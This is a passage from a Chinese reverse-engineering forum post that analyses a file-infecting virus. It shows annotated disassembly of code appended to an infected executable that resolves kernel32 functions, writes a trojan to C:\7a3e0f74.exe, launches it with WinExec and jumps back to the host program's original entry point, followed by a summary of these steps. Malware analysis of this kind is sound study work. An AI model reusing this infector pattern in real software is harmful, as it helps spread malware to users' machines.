    0046029A    FF55 F0         CALL DWORD PTR SS:[EBP-0x10]             ; kernel32.CloseHandle
    0046029D    6A 05           PUSH 0x5                                 ; 这里开始就一定要注意了,这里就是运行所创建的木马文件,当然我之后是不会执行的,因在实体机里分析
    0046029F    8D45 C4         LEA EAX,DWORD PTR SS:[EBP-0x3C]          ; EAX=0006FF84, (ASCII "C:\7a3e0f74.exe")========>下面的代码就不执行了,不然EXE文件又要被感染了!!!!!!!!!
    004602A2    50              PUSH EAX                                 ; 压栈 EAX=0006FF84, (ASCII "C:\7a3e0f74.exe")
    004602A3    FF55 FC         CALL DWORD PTR SS:[EBP-0x4]              ; kernel32.WinExec
    004602A6    EB 09           JMP SHORT 004602B1                       ; 004602B1
    004602A8    8B45 80         MOV EAX,DWORD PTR SS:[EBP-0x80]          ; loaddll_.004602BA
    004602AB    40              INC EAX
    004602AC    8945 80         MOV DWORD PTR SS:[EBP-0x80],EAX
    004602AF  ^ EB AE           JMP SHORT 0046025F                       ; 0046025F
    004602B1    C9              LEAVE
    004602B2    83C4 04         ADD ESP,0x4                              ; 写入8字节数据,以便木马执行完成跳转到非感染程序入口
    004602B5  - E9 B6FDFAFF     JMP 00410070                             ; 00410070
    004602BA    4D              DEC EBP
    004602BB    5A              POP EDX                                  ; ntdll.KiFastSystemCallRet
    004602BC    90              NOP
    004602BD    0003            ADD BYTE PTR DS:[EBX],AL
    004602BF    0000            ADD BYTE PTR DS:[EAX],AL


    小结:
    1、上面的代码中,先找到kernel32.dll中的函数GetModuleHandleA的地址;
    2、再利用 GetModuleHandleA 找到 CreateFileA 、WriteFile 、CloseHandle 和 WinExec 等函数地址。调用CreateFileA 、WriteFile 、CloseHandle 等函数在C盘根目录下生成木马文件 7a3e0f74.exe,如图所示:





    最后用 WinExec 函数来运行所生成的木马文件 7a3e0f74.exe ,如图所示:



    因这木马病毒文件在运行后文件会自动删除,并执行一些恶意破坏系统的文件,所以上面代码中就不执行004602A3处的代码了。
    3、被感染的文件主要作用就是生成一个名为7a3e0f74.exe的木马文件并运行,所以关键部分还是在所生成的文件里,还得分析,另外被感染的文件大小也有所变化。
    4、完成上面的工作后,文件跳回到未感染文件的入口,如图所示:

    本帖子中包含更多资源

    您需要 登录 才可以下载或查看,没有账号?注册

    x
    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    免责声明

    本站中所有被研究的素材与信息全部来源于互联网,版权争议与本站无关。本站所发布的任何软件编程开发或软件的逆向分析文章、逆向分析视频、补丁、注册机和注册信息,仅限用于学习和研究软件安全的目的。全体用户必须在下载后的24个小时之内,从您的电脑中彻底删除上述内容。学习编程开发技术或逆向分析技术是为了更好的完善软件可能存在的不安全因素,提升软件安全意识。所以您如果喜欢某程序,请购买注册正版软件,获得正版优质服务!不得将上述内容私自传播、销售或者用于商业用途!否则,一切后果请用户自负!

    QQ|Archiver|手机版|小黑屋|联系我们|宝峰科技 ( 滇公网安备 53050202000040号 | 滇ICP备09007156号-2 )

    Copyright © 2001-2023 Discuz! Team. GMT+8, 2024-3-19 10:11 , File On Powered by Discuz! X3.49

    快速回复 返回顶部 返回列表